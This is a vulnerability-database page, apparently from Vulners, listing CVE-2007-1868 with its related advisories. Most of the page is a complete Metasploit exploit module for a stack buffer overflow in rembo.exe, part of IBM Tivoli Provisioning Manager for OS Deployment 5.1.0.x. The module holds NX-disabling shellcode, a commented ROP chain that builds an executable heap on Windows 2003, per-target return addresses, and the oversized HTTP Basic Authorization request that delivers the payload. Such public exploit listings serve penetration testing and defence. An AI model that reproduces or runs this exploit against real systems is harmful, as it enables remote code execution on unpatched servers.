Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow

🗓️ 03 May 2007 20:02:28Reported by totoType 
metasploit
 metasploit🔗 www.rapid7.com👁 19 Views

IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2007-1868
20 Sep 201000:00
circl
CVE		CVE-2007-1868
4 Apr 200716:00
cve
Cvelist		CVE-2007-1868
4 Apr 200716:00
cvelist
Exploit DB		IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Remote Buffer Overflow (Metasploit)
20 Sep 201000:00
exploitdb
Tenable Nessus		IBM Tivoli Provisioning Manager OS Deployment Multiple Unspecified Input Validation Vulnerabilities
7 Apr 200700:00
nessus
Tenable Nessus		IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows
3 May 200700:00
nessus
NVD		CVE-2007-1868
4 Apr 200716:19
nvd
Packet Storm		IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
26 Nov 200900:00
packetstorm
Prion		Code injection
4 Apr 200716:19
prion
securityvulns		TPTI-07-05: IBM Tivoli Provisioning Manager for OS Deployment Multiple Stack Overflow Vulnerabilities
4 May 200700:00
securityvulns
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow',
      'Description'    => %q{
          This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager
        for OS Deployment version 5.1.0.X.
      },
      'Author'         => 'toto',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-1868'],
          [ 'OSVDB', '34678'],
          [ 'BID', '23264'],
          [ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          #'Space'    => 0x200,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",
          'Prepend' =>
              # Disable NX on 2k3 to upload data on the stack
              # (service crashes if the stack is switched to the heap)
              "\x64\x8b\x0d\x30\x00\x00\x00"              + # mov ecx, dword ptr fs:[0x30] ; PEB
              "\x83\xb9\xa4\x00\x00\x00\x05"              + # cmp dword ptr [ecx+0xa4], 5  ; MajorVersion == 5
              "\x75\x30"                                  + # jnz after
              "\x83\xb9\xa8\x00\x00\x00\x02"              + # cmp dword ptr [ecx+0xa8], 2  ; MinorVersion == 2
              "\x75\x27"                                  + # jnz after
              "\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00"  + # cmp dword ptr [ecx+0xac], 0xece  ; BuildVersion (> SP0)
              "\x76\x1b"                                  + # jbe after
              "\x8d\x89\xa8\x00\x00\x00"                  + # lea ecx, [ecx+0xa8]
              "\xba\x00\x03\xfe\x7f"                      + # mov edx, 0x7ffe0300
              "\xb8\xed\x00\x00\x00"                      + # mov eax, 0xed
              "\x6a\x04"                                  + # push 4
              "\x51"                                      + # push ecx
              "\x6a\x22"                                  + # push 22
              "\x6a\xff"                                  + # push -1
              "\x6a\xff"                                  + # push -1 (padding)
              "\xff\x12",                                   # call dword ptr[edx]
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['TPMfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],
          # tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)
          ['TPMfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],
        ],
      'DisclosureDate' => '2007-05-02',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ])
  end

  def exploit

    if target.name =~ /2003/
      # the exploit allocates and executable heap to copy and execute the payload

      auth = Rex::Text.rand_text_alphanumeric(2800)

      ib = target['IB']

      auth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V')  # store a data to prevent a crash

      # ret 1:
      # 76a81a5f:
      # pop esi  <- 0x76a91010
      # pop ebx  <- 0x76a91010
      # pop ebp  <- 0x76a91010
      # retn

      auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')
      auth[ 2100, 4 ] = [ target['Data'] ].pack('V')
      auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')
      auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')

      # ret 2:
      # 76a817f0:
      # pop esi   <- 0x76a81512 (ocscpy pointer)
      # retn

      auth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V')
      auth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V')

      # ret 3: (copy the payload in atl.dll data)
      # 76a811c8
      # lea eax, [esp+3c]   <-- eax points to the payload
      # push eax       <- payload
      # push ebp       <- 0x76a91010
      # call esi       <- ocscpy
      # cmp eax, ebx   <- eax == ebx = 0x76a91010
      # jnz before     <- jump not taken
      # mov eax, ebp
      # pop edi
      # pop esi
      # pop ebp
      # pop ebx
      # add esp, 1ch
      # retn

      auth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V')


      # ret 4:  (increase the stack pointer to allow a jump back in the payload)
      # add esp, 1ch
      # retn

      auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V')
      auth[ 2184, 2 ] = "\xeb\x56"    # jmp payload


      # ret 5: (create an executable heap - huge one)
      # 76a8c0c4
      # jmp ds:__imp_HeapCreate  (0xffffffff, 0x01010101, 0x01010101)

      auth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V')

      # ret 6:
      # 76a817f0
      # pop esi  <- 0x76a92a38 (hHeap)
      # retn

      auth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V')
      auth[ 2208, 4 ] = [ 0xffffffff ].pack('V')
      auth[ 2212, 4 ] = [ 0x01010101 ].pack('V')
      auth[ 2216, 4 ] = [ 0x01010101 ].pack('V')
      auth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V')

      # ret 7:
      # 76a8190a
      # mov [esi], eax   <- store new heap in hHeap
      # mov eax, esi
      # pop esi
      # retn 4

      auth[ 2224, 4 ] = [ ib + 0x190a ].pack('V')

      # ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception):
      # 76a88a29
      # mov eax, [esp+arg_0]  <- 0x7fffffa0
      # imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400
      # push eax
      # call _malloc
      # pop ecx    <- ecx = 0x2400
      # retn

      auth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V')

      # ret 9:
      # 76a8c9ab
      # add esp, 0ch
      # retn 4

      auth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V')
      auth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V')
      auth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V')

      # ret 10 (copy payload into heap):
      # 76a8c9a0
      # push ecx   <- 0x2400
      # push [esp+8]  <- 0x76a91010   (payload in atl.dll data)
      # push eax    <- heap pointer
      # call _memcpy
      # add esp, 0ch
      # retn

      auth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V')

      # ret 11 (jump into heap)
      # 76a815e7
      # call eax

      auth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V')
      auth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V')

      auth[ 2272, payload.encoded.length ] = payload.encoded

    else
      auth = Rex::Text.rand_text_alphanumeric(2800)

      auth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V')
      auth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V')  # pop, ret
      auth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V')
      auth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V')  # jmp esp
      auth[ 2108, payload.encoded.length ] = payload.encoded

    end

    print_status("Trying target #{target.name}...")

    res = send_request_cgi({
      'uri'          => '/',
      'method'       => 'GET',
      'headers'      =>
      {
        'Authorization' => "Basic #{auth}"
      }
    }, 5)

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
7.3High risk
Vulners AI Score7.3
CVSS 210
EPSS0.77135
ibm tpmos deploymentbuffer overflowmetasploitcvebid
19